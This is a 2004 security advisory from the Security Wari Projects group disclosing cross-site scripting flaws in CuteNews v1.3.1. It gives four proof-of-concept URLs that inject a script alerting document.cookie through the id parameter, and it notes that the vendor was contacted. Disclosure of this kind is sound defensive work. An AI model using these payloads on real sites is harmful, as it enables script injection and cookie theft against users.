Cross-Site Scripting CuteNews
http://www.swp-zone.org/archivos/advisory-06.txt
-------------------------------------------------------------------------------------------------
:.: Cross-Site Scripting CuteNews :.:
PROGRAM: CuteNews
HOMEPAGE: http://cutephp.com/
VERSION: v1.3.1
BUG: Cross-Site Scripting
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
CuteNews is a popular News Publishing, written in php by
CutePHP.
2.- Vulnerabilities:
---------------
A. Cross-Site Scripting aka XSS:
:.: In Id :
http://attacker/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&
http://attacker/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&
http://attacker/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>
http://attacker/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script>
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the CuteNews website for updates and official release details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------